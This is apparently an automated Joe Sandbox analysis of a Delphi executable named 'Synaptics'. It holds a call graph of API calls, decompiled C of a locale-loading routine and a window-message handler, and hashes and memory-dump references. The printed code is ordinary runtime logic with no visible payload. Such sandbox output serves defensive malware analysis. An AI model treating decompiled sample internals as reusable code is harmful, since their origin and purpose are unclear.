47599->47602 47603 497ee3 47600->47603 47601->47604 47607 45a800 PostQuitMessage 47601->47607 47605 49808e 47602->47605 47606 498080 47602->47606 47610 4758e8 26 API calls 47603->47610 47604->47559 47609 473490 15 API calls 47605->47609 47608 45a800 PostQuitMessage 47606->47608 47607->47604 47611 49808c 47608->47611 47612 4980a4 47609->47612 47613 497f0a 47610->47613 47611->47604 47612->47604 47615 45a800 PostQuitMessage 47612->47615 47614 404a14 26 API calls 47613->47614 47616 497f17 47614->47616 47615->47611 47617 409628 57 API calls 47616->47617 47618 497f21 47617->47618 47619 409628 57 API calls 47618->47619 47620 497f37 47619->47620 47621 4967d4 12 API calls 47620->47621 47622 497f3f 47620->47622 47621->47622 47623 409bac DeleteFileA 47622->47623 47623->47579 47625 4737cd 47624->47625 47625->47547 47647 402bc8 QueryPerformanceCounter 47626->47647 47628 472d64 47650 404a58 47628->47650 47631 4049c0 12 API calls 47633 472d78 47631->47633 47634 404c88 26 API calls 47633->47634 47635 472da8 47633->47635 47654 404ba8 47633->47654 47634->47633 47657 4049e4 47635->47657 47638 404d40 47639 404d51 47638->47639 47640 404d77 47639->47640 47641 404d8e 47639->47641 47661 40500c 26 API calls 47640->47661 47642 404a84 25 API calls 47641->47642 47644 404d84 47642->47644 47645 404dbf 47644->47645 47646 404a14 26 API calls 47644->47646 47646->47645 47648 402be0 GetTickCount 47647->47648 47649 402bd5 47647->47649 47648->47628 47649->47628 47652 404a5c 47650->47652 47651 404a80 47651->47631 47652->47651 47653 40277c 12 API calls 47652->47653 47653->47651 47655 404ab0 26 API calls 47654->47655 47656 404bb5 47655->47656 47656->47633 47659 4049ea 47657->47659 47658 404a10 47658->47638 47659->47658 47660 40277c 12 API calls 47659->47660 47660->47659 47661->47644 47663 43c212 47662->47663 47664 43c2ce 47663->47664 47665 43c258 47663->47665 47667 43c2e9 47663->47667 47668 43c2c3 47663->47668 47680 45b21c 119 API calls 47664->47680 47665->47667 47674 45601c 47665->47674 47667->47443 
47668->47665 47669 43c32a GetKeyboardState 47668->47669 47670 43c346 47669->47670 47670->47667 47672->47443 47673->47444 47675 45602b 47674->47675 47681 454a44 47675->47681 47678 45604b 47678->47667 47680->47665 47682 454ad8 47681->47682 47684 454a68 47681->47684 47685 454ae9 47682->47685 47711 44e3bc 73 API calls 47682->47711 47684->47682 47689 458260 57 API calls 47684->47689 47695 406a70 57 API calls 47684->47695 47710 40d180 57 API calls 47684->47710 47686 454b29 47685->47686 47687 454bc1 47685->47687 47691 454b9c 47686->47691 47701 454b44 47686->47701 47688 454bdb 47687->47688 47692 454bd5 SetMenu 47687->47692 47690 454bed 47688->47690 47708 454b9a 47688->47708 47689->47684 47714 45497c 63 API calls 47690->47714 47691->47688 47698 454bb0 47691->47698 47692->47688 47695->47684 47696 454bf4 47697 4049c0 12 API calls 47696->47697 47700 454c09 47697->47700 47702 454bb9 SetMenu 47698->47702 47700->47678 47709 455f20 10 API calls 47700->47709 47701->47688 47703 454b67 GetMenu 47701->47703 47702->47688 47704 454b71 47703->47704 47705 454b8a 47703->47705 47707 454b84 SetMenu 47704->47707 47712 44e3bc 73 API calls 47705->47712 47707->47705 47708->47688 47713 455b08 65 API calls 47708->47713 47709->47678 47710->47684 47711->47685 47712->47708 47713->47690 47714->47696 47715->47455 47716->47457 47718 4597fb 47717->47718 47719 459806 SetThreadLocale 47718->47719 47721 459825 47718->47721 47722 459815 47718->47722 47743 40e2e8 75 API calls 47719->47743 47721->47462 47722->47721 47723 4587a4 38 API calls 47722->47723 47723->47721 47724->47539 47725->47466 47726->47539 47727->47539 47728->47539 47729->47514 47730->47531 47731->47532 47732->47530 47733->47539 47735 43c14c SetFocus 47734->47735 47735->47539 47736->47519 47737->47537 47738->47537 47739->47537 47740->47523 47741->47539 47742->47539 47743->47722 47744 409974 WriteFile 47745 409991 47744->47745 47746 45e750 47747 45e9bb 47746->47747 47748 45e769 47746->47748 47748->47747 47749 40275c 25 API calls 47748->47749 
47753 45e8f3 47749->47753 47750 45e958 SHChangeNotifyRegister 47751 40277c 12 API calls 47750->47751 47752 45e9b3 47751->47752 47753->47750 47754 41ac6c 57 API calls 47753->47754 47754->47753 47755 434434 47758 43e6bc 47755->47758 47766 43e6ef 47758->47766 47759 43e768 GetClassInfoA 47760 43e78f 47759->47760 47761 43e7cd 47760->47761 47762 43e7a0 UnregisterClassA 47760->47762 47763 43e7ad RegisterClassA 47760->47763 47786 43e88c 47761->47786 47762->47763 47763->47761 47764 43e7c8 47763->47764 47814 40e79c 59 API calls 47764->47814 47765 406a70 57 API calls 47769 43e751 47765->47769 47766->47759 47766->47765 47772 43e71c 47766->47772 47813 40d180 57 API calls 47769->47813 47770 43e7f1 GetWindowLongA 47774 43e827 47770->47774 47775 43e806 GetWindowLongA 47770->47775 47772->47759 47789 40a1d4 47774->47789 47775->47774 47777 43e818 SetWindowLongA 47775->47777 47777->47774 47780 43e83b 47800 424e24 47780->47800 47782 43e845 47783 4049c0 12 API calls 47782->47783 47784 43445b 47783->47784 47816 407a8c 47786->47816 47788 43e7e3 47788->47770 47815 40e79c 59 API calls 47788->47815 47790 40a1e2 47789->47790 47791 40a1d8 47789->47791 47793 441a14 IsIconic 47790->47793 47792 40277c 12 API calls 47791->47792 47792->47790 47794 441a51 GetWindowRect 47793->47794 47795 441a2c GetWindowPlacement 47793->47795 47796 441a5e GetWindowLongA 47794->47796 47795->47796 47797 441a73 GetWindowLongA 47796->47797 47798 441a99 47796->47798 47797->47798 47799 441a87 ScreenToClient ScreenToClient 47797->47799 47798->47780 47799->47798 47801 424e59 47800->47801 47802 424f8c 47800->47802 47821 424168 RtlEnterCriticalSection 47801->47821 47804 4049e4 12 API calls 47802->47804 47805 424fac 47804->47805 47805->47782 47806 424f6d 47823 424174 RtlLeaveCriticalSection 47806->47823 47808 424f84 47808->47782 47809 424e63 47809->47806 47822 408f88 CompareStringA 47809->47822 47811 424f5e CreateFontIndirectA 47811->47806 47812 424efa 47812->47811 47813->47772 47814->47761 47815->47770 47820 402c0c 
47816->47820 47818 407a9f CreateWindowExA 47819 407ad9 47818->47819 47819->47788 47820->47818 47821->47809 47822->47812 47823->47808 47824 4099d8 CloseHandle

Control-flow Graph

C-Code - Quality: 65%
E004061D0(intOrPtr __eax) {
	intOrPtr _v8;
	void* _v12;
	char _v15;
	char _v17;
	char _v18;
	char _v22;
	int _v28;
	char _v289;
	long _t44;
	long _t61;
	long _t63;
	CHAR* _t70;
	CHAR* _t72;
	struct HINSTANCE__* _t78;
	struct HINSTANCE__* _t84;
	char* _t94;
	void* _t95;
	intOrPtr _t99;
	struct HINSTANCE__* _t107;
	void* _t110;
	void* _t112;
	intOrPtr _t113;

	_t110 = _t112;
	_t113 = _t112 + 0xfffffee0;
	_v8 = __eax;
	GetModuleFileNameA(0,  &_v289, 0x105);
	_v22 = 0;
	_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
	if(_t44 == 0) {
		L3:
		_push(_t110);
		_push(0x4062d5);
		_push( *[fs:eax]);
		 *[fs:eax] = _t113;
		_v28 = 5;
		E00406018( &_v289, 0x105);
		if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040643C, 0, 0,  &_v22,  &_v28) != 0) {
			_v22 = 0;
		}
		_v18 = 0;
		_pop(_t99);
		 *[fs:eax] = _t99;
		_push(E004062DC);
		return RegCloseKey(_v12);
	} else {
		_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
		if(_t61 == 0) {
			goto L3;
		} else {
			_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
			if(_t63 != 0) {
				_push(0x105);
				_push(_v8);
                                                                                                                                                                                                                            							_push( &_v289);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                                                                                                                                                                            							_t107 = 0;
                                                                                                                                                                                                                            							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                                                                                                                                                            								_t70 =  &_v289;
                                                                                                                                                                                                                            								_push(_t70);
                                                                                                                                                                                                                            								L00401324();
                                                                                                                                                                                                                            								_t94 = _t70 +  &_v289;
                                                                                                                                                                                                                            								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                                                                                                                                                                            									_t94 = _t94 - 1;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t72 =  &_v289;
                                                                                                                                                                                                                            								if(_t94 != _t72) {
                                                                                                                                                                                                                            									_t95 = _t94 + 1;
                                                                                                                                                                                                                            									if(_v22 != 0) {
                                                                                                                                                                                                                            										_push(0x105 - _t95 - _t72);
                                                                                                                                                                                                                            										_push( &_v22);
                                                                                                                                                                                                                            										_push(_t95);
                                                                                                                                                                                                                            										L0040131C();
                                                                                                                                                                                                                            										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									if(_t107 == 0 && _v17 != 0) {
                                                                                                                                                                                                                            										_push(0x105 - _t95 -  &_v289);
                                                                                                                                                                                                                            										_push( &_v17);
                                                                                                                                                                                                                            										_push(_t95);
                                                                                                                                                                                                                            										L0040131C();
                                                                                                                                                                                                                            										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                                                                                                                                                            										_t107 = _t78;
                                                                                                                                                                                                                            										if(_t107 == 0) {
                                                                                                                                                                                                                            											_v15 = 0;
                                                                                                                                                                                                                            											_push(0x105 - _t95 -  &_v289);
                                                                                                                                                                                                                            											_push( &_v17);
                                                                                                                                                                                                                            											_push(_t95);
                                                                                                                                                                                                                            											L0040131C();
                                                                                                                                                                                                                            											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                                                                                                                                                            											_t107 = _t84;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							return _t107;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


























APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001), ref: 0040620A
• RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC), ref: 00406228
• RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
• RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                            • Opcode ID: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction ID: 811a2f83ad3c420e2a37c3e1c64e1457f6d65cd41ace4c5469d47de9f0911395
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33927cb62ecfd5549c3be19904b1b3d508321337e1920c792e850b954a3a3b8f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60517375A4025C7EFB21D6A48C46FEF77AC9B04744F4100BBBA05F61C2E6789E548BA8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00459934(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                                                                            				struct HWND__* _v12;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t161;
                                                                                                                                                                                                                            				struct HWND__* _t162;
                                                                                                                                                                                                                            				struct HWND__* _t163;
                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                            				struct HWND__* _t176;
                                                                                                                                                                                                                            				struct HWND__* _t185;
                                                                                                                                                                                                                            				struct HWND__* _t188;
                                                                                                                                                                                                                            				struct HWND__* _t189;
                                                                                                                                                                                                                            				struct HWND__* _t191;
                                                                                                                                                                                                                            				struct HWND__* _t197;
                                                                                                                                                                                                                            				struct HWND__* _t199;
                                                                                                                                                                                                                            				struct HWND__* _t202;
                                                                                                                                                                                                                            				struct HWND__* _t205;
                                                                                                                                                                                                                            				struct HWND__* _t206;
                                                                                                                                                                                                                            				struct HWND__* _t216;
                                                                                                                                                                                                                            				struct HWND__* _t217;
                                                                                                                                                                                                                            				struct HWND__* _t222;
                                                                                                                                                                                                                            				struct HWND__* _t224;
                                                                                                                                                                                                                            				struct HWND__* _t227;
                                                                                                                                                                                                                            				struct HWND__* _t231;
                                                                                                                                                                                                                            				struct HWND__* _t239;
                                                                                                                                                                                                                            				struct HWND__* _t247;
                                                                                                                                                                                                                            				struct HWND__* _t250;
                                                                                                                                                                                                                            				struct HWND__* _t254;
                                                                                                                                                                                                                            				struct HWND__* _t256;
                                                                                                                                                                                                                            				struct HWND__* _t257;
                                                                                                                                                                                                                            				struct HWND__* _t269;
                                                                                                                                                                                                                            				intOrPtr _t272;
                                                                                                                                                                                                                            				struct HWND__* _t275;
                                                                                                                                                                                                                            				intOrPtr* _t276;
                                                                                                                                                                                                                            				struct HWND__* _t284;
                                                                                                                                                                                                                            				struct HWND__* _t286;
                                                                                                                                                                                                                            				struct HWND__* _t297;
                                                                                                                                                                                                                            				void* _t306;
                                                                                                                                                                                                                            				signed int _t308;
                                                                                                                                                                                                                            				struct HWND__* _t314;
                                                                                                                                                                                                                            				struct HWND__* _t315;
                                                                                                                                                                                                                            				struct HWND__* _t316;
                                                                                                                                                                                                                            				void* _t317;
                                                                                                                                                                                                                            				intOrPtr _t340;
                                                                                                                                                                                                                            				struct HWND__* _t344;
                                                                                                                                                                                                                            				intOrPtr _t366;
                                                                                                                                                                                                                            				void* _t370;
                                                                                                                                                                                                                            				struct HWND__* _t375;
                                                                                                                                                                                                                            				void* _t376;
                                                                                                                                                                                                                            				void* _t377;
                                                                                                                                                                                                                            				intOrPtr _t378;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x459fee);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E004597E8(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0045BA10(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E004598AC(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045A600(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0045A5A4(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00451750(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0045AAE4(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00441704(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00441704(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00441704(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x49be6c = 0;
											_t206 = GetFocus();
											SetFocus(E00441704(_t372));
											E0043C130(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x49be6c = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0045A47C(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
                                                                                                                                                                                                                            								E0045A054(_v8);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eflags = _t231 == 0x100;
                                                                                                                                                                                                                            								if(_t231 == 0x100) {
                                                                                                                                                                                                                            									E0045A104(_v8);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E004598AC(_t377);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t239 = _t227 + 0xffffffe0 - 7;
                                                                                                                                                                                                                            						__eflags = _t239;
                                                                                                                                                                                                                            						if(_t239 < 0) {
                                                                                                                                                                                                                            							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t239 == 0x1e1;
                                                                                                                                                                                                                            						if(_t239 == 0x1e1) {
                                                                                                                                                                                                                            							_t247 = E004329D8(E004328F8());
                                                                                                                                                                                                                            							__eflags = _t247;
                                                                                                                                                                                                                            							if(_t247 != 0) {
                                                                                                                                                                                                                            								E00432A34(E004328F8());
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L101;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						goto L89;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _t161 - 0x16;
                                                                                                                                                                                                                            					if(__eflags > 0) {
                                                                                                                                                                                                                            						__eflags = _t161 - 0x1d;
                                                                                                                                                                                                                            						if(__eflags > 0) {
                                                                                                                                                                                                                            							_t250 = _t161 - 0x37;
                                                                                                                                                                                                                            							__eflags = _t250;
                                                                                                                                                                                                                            							if(_t250 == 0) {
                                                                                                                                                                                                                            								 *(_v12 + 0xc) = E0045A038(_v8);
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t250 == 0x13;
                                                                                                                                                                                                                            							if(_t250 == 0x13) {
                                                                                                                                                                                                                            								_t254 = _v12;
                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
                                                                                                                                                                                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
                                                                                                                                                                                                                            									_t256 = _v8;
                                                                                                                                                                                                                            									__eflags =  *((char*)(_t256 + 0x9e));
                                                                                                                                                                                                                            									if( *((char*)(_t256 + 0x9e)) != 0) {
                                                                                                                                                                                                                            										_t257 = _v8;
                                                                                                                                                                                                                            										__eflags =  *(_t257 + 0xa0);
                                                                                                                                                                                                                            										if( *(_t257 + 0xa0) != 0) {
                                                                                                                                                                                                                            											 *(_v12 + 0xc) = 0;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t314 = E0040EDC4("vcltest3.dll", _t308, 0x8000);
                                                                                                                                                                                                                            											 *(_v8 + 0xa0) = _t314;
                                                                                                                                                                                                                            											__eflags = _t314;
                                                                                                                                                                                                                            											if(_t314 == 0) {
                                                                                                                                                                                                                            												 *(_v12 + 0xc) = GetLastError();
                                                                                                                                                                                                                            												 *(_v8 + 0xa0) = 0;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(_v12 + 0xc) = 0;
                                                                                                                                                                                                                            												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                                                                                                                                                                                                            												_t315 = _t375;
                                                                                                                                                                                                                            												__eflags = _t375;
                                                                                                                                                                                                                            												if(_t375 != 0) {
                                                                                                                                                                                                                            													_t269 =  *(_v12 + 8);
                                                                                                                                                                                                                            													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L102;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L101;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							_t272 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            							E00458DEC(_t272);
                                                                                                                                                                                                                            							E004598AC(_t377);
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t275 = _t161 - 0x1a;
                                                                                                                                                                                                                            						__eflags = _t275;
                                                                                                                                                                                                                            						if(_t275 == 0) {
                                                                                                                                                                                                                            							_t276 =  *0x49ddb0; // 0x49eb18
                                                                                                                                                                                                                            							E00445ED0( *_t276, _t317,  *(_v12 + 4));
                                                                                                                                                                                                                            							E00459840(_v8, _t308, _t317, _v12, _t370);
                                                                                                                                                                                                                            							E004598AC(_t377);
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t275 == 2;
                                                                                                                                                                                                                            						if(_t275 == 2) {
                                                                                                                                                                                                                            							E004598AC(_t377);
                                                                                                                                                                                                                            							_t284 = _v12;
                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
                                                                                                                                                                                                                            							asm("sbb eax, eax");
                                                                                                                                                                                                                            							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
                                                                                                                                                                                                                            							_t286 = _v12;
                                                                                                                                                                                                                            							__eflags =  *(_t286 + 4);
                                                                                                                                                                                                                            							if( *(_t286 + 4) == 0) {
                                                                                                                                                                                                                            								E0045973C();
                                                                                                                                                                                                                            								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E0045974C(_v8);
                                                                                                                                                                                                                            								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L102;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							goto L101;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						_t297 = _v12;
                                                                                                                                                                                                                            						__eflags =  *(_t297 + 4);
                                                                                                                                                                                                                            						if( *(_t297 + 4) != 0) {
                                                                                                                                                                                                                            							 *((char*)(_v8 + 0x9c)) = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L102;
